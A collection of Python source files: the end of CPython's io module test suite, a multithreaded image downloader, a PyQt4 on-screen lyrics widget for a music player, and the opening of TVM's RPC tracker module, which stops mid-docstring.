t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
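        # '\u8888' is the three UTF-8 bytes e8 a2 88; feeding them one at a
        # time checks that incomplete sequences are buffered by the decoder.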
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
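        # U+0D00 and U+0A00 are not newlines, even though their encoded forms
        # contain the raw byte values of '\r' (0x0D) and '\n' (0x0A).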
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
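                # Keep writing until the pipe fills and the non-blocking write
                # raises BlockingIOError; characters_written records how much
                # of the last message actually reached the pipe.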
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
download_imgs.py
|
import codecs
import os
import urllib
import threading
class DownloadImgs(object):
def __init__(self, img_urls_file, thread_num=8):
self.img_urls_file = img_urls_file
self.fold_name = self.img_urls_file.split("/")[-1].split(".")[0]
self.__get_img_urls_list()
if not os.path.exists("./"+self.fold_name):
os.mkdir("./"+self.fold_name)
self.thread_num = thread_num
def __get_img_urls_list(self):
with codecs.open(self.img_urls_file, 'r') as fread:
self.img_urls = [i.strip() for i in fread.readlines()]
self.imgs_num = len(self.img_urls)
def __download_img(self, thread_id):
thread_url_list = []
for index, img_url in enumerate(self.img_urls):
            # round-robin split: thread ``thread_id`` handles every ``thread_num``-th url
            if index % self.thread_num == thread_id:
thread_url_list.append(img_url)
for img_url in thread_url_list:
try:
save_path = os.path.join("./"+self.fold_name, img_url.split("/")[-1])
print "img_url: {0}, save_path: {1}".format(img_url, save_path)
urllib.urlretrieve(img_url, save_path)
except Exception as e:
print "e: {0}".format(e.message)
continue
def fit(self):
for i in range(self.thread_num):
t = threading.Thread(target=self.__download_img, args=(i,))
t.start()
if __name__ == "__main__":
download_imgs = DownloadImgs("../raw_data/age_college/urls_age_college.txt",20)
download_imgs.fit()
|
osdlyrics.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# osdlyrics.py --- desktop lyrics for musicbox
# Copyright (c) 2015-2016 omi & Contributors
import sys
import logger
from config import Config
from multiprocessing import Process
log = logger.getLogger(__name__)
config = Config()
try:
from PyQt4 import QtGui, QtCore, QtDBus
pyqt_activity = True
except ImportError:
pyqt_activity = False
log.warn("PyQt4 module not installed.")
log.warn("Osdlyrics Not Available.")
if pyqt_activity:
class Lyrics(QtGui.QWidget):
def __init__(self):
super(Lyrics, self).__init__()
self.__dbusAdaptor = LyricsAdapter(self)
self.initUI()
def initUI(self):
self.setStyleSheet("background:" + config.get_item(
"osdlyrics_background"))
if config.get_item("osdlyrics_transparent"):
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
self.setAttribute(QtCore.Qt.WA_ShowWithoutActivating)
self.setAttribute(QtCore.Qt.WA_X11DoNotAcceptFocus)
self.setFocusPolicy(QtCore.Qt.NoFocus)
if config.get_item("osdlyrics_on_top"):
self.setWindowFlags(QtCore.Qt.FramelessWindowHint |
QtCore.Qt.WindowStaysOnTopHint |
QtCore.Qt.X11BypassWindowManagerHint)
else:
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setMinimumSize(600, 50)
self.resize(600, 60)
scn = QtGui.QApplication.desktop().screenNumber(
QtGui.QApplication.desktop().cursor().pos())
br = QtGui.QApplication.desktop().screenGeometry(scn).bottomRight()
frameGeo = self.frameGeometry()
frameGeo.moveBottomRight(br)
self.move(frameGeo.topLeft())
self.text = u"OSD Lyrics for Musicbox"
self.setWindowTitle("Lyrics")
self.show()
def mousePressEvent(self, event):
self.mpos = event.pos()
def mouseMoveEvent(self, event):
            if event.buttons() & QtCore.Qt.LeftButton:
diff = event.pos() - self.mpos
newpos = self.pos() + diff
self.move(newpos)
def wheelEvent(self, event):
self.resize(self.width() + event.delta(), self.height())
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
self.drawText(event, qp)
qp.end()
def drawText(self, event, qp):
osdlyrics_color = config.get_item("osdlyrics_color")
osdlyrics_font = config.get_item("osdlyrics_font")
font = QtGui.QFont(osdlyrics_font[0], osdlyrics_font[1])
pen = QtGui.QColor(osdlyrics_color[0], osdlyrics_color[1],
osdlyrics_color[2])
qp.setFont(font)
qp.setPen(pen)
qp.drawText(event.rect(), QtCore.Qt.AlignCenter |
QtCore.Qt.TextWordWrap, self.text)
class LyricsAdapter(QtDBus.QDBusAbstractAdaptor):
QtCore.Q_CLASSINFO("D-Bus Interface", "local.musicbox.Lyrics")
QtCore.Q_CLASSINFO(
"D-Bus Introspection",
' <interface name="local.musicbox.Lyrics">\n'
' <method name="refresh_lyrics">\n'
' <arg direction="in" type="s" name="lyric"/>\n'
' </method>\n'
' </interface>\n')
def __init__(self, parent):
super(LyricsAdapter, self).__init__(parent)
@QtCore.pyqtSlot(str)
def refresh_lyrics(self, text):
self.parent().text = text
self.parent().repaint()
def show_lyrics():
app = QtGui.QApplication(sys.argv)
lyrics = Lyrics()
QtDBus.QDBusConnection.sessionBus().registerService('org.musicbox.Bus')
QtDBus.QDBusConnection.sessionBus().registerObject('/', lyrics)
sys.exit(app.exec_())
def show_lyrics_new_process():
if pyqt_activity and config.get_item("osdlyrics"):
p = Process(target=show_lyrics)
p.daemon = True
p.start()
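# Illustrative sketch (assumption, not part of the original module): once the widget is
# running, another process could push a new line through the D-Bus method registered
# above, e.g. with PyQt4's QtDBus:
#
#   bus = QtDBus.QDBusConnection.sessionBus()
#   iface = QtDBus.QDBusInterface('org.musicbox.Bus', '/', 'local.musicbox.Lyrics', bus)
#   iface.call('refresh_lyrics', 'Some lyric line')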
|
tracker.py
|
"""RPC Tracker, tracks and distributes the TVM RPC resources.
This file implements the tracker server logic.
Note
----
Tracker is a TCP based rest api with the following protocol:
- Initial handshake to the peer
- RPC_TRACKER_MAGIC
- Normal message: [size(int32), json-data]
- Each message is initiated by the client, and the tracker replies with a json.
List of available APIs:
- PING: check if tracker is alive
- input: [TrackerCode.PING]
- return: TrackerCode.SUCCESS
- PUT: report resource to tracker
- input: [TrackerCode.PUT, [port, match-key]]
- return: TrackerCode.SUCCESS
  - note: match-key is a randomly generated key used to identify the resource during the connection.
- REQUEST: request a new resource from tracker
- input: [TrackerCode.REQUEST, [key, user, priority]]
- return: [TrackerCode.SUCCESS, [url, port, match-key]]
"""
import heapq
import time
import logging
import socket
import multiprocessing
import errno
import struct
import json
try:
from tornado import ioloop
from . import tornado_util
except ImportError as error_msg:
raise ImportError(
"RPCTracker module requires tornado package %s" % error_msg)
from ..._ffi.base import py_str
from . import base
from .base import RPC_TRACKER_MAGIC, TrackerCode
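# Illustrative sketch (not part of the original module): a minimal client-side PING
# exchange following the handshake described in the docstring above. The helper name
# `_example_ping` is hypothetical; it only reuses the socket/struct/base calls that
# Tracker._stop_tracker below already relies on.
def _example_ping(host, port):
    """Return True if a tracker listening on (host, port) answers a PING."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    # initial handshake: both sides exchange the 4-byte RPC_TRACKER_MAGIC
    sock.sendall(struct.pack("@i", RPC_TRACKER_MAGIC))
    magic = struct.unpack("@i", base.recvall(sock, 4))[0]
    assert magic == RPC_TRACKER_MAGIC
    # normal message: [size(int32), json-data]; base.sendjson/recvjson do the framing
    base.sendjson(sock, [TrackerCode.PING])
    success = base.recvjson(sock) == TrackerCode.SUCCESS
    sock.close()
    return success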
class Scheduler(object):
"""Abstratc interface of scheduler."""
def put(self, value):
"""Push a resource into the scheduler.
This function can trigger callbacks in the scheduler.
Parameters
----------
value : object
The resource to be put in the scheduler.
"""
raise NotImplementedError()
def request(self, user, priority, callback):
"""Request a resource.
Parameters
----------
user : str
The user who is requesting the resource.
priority : int
The job priority
callback : function: value->bool
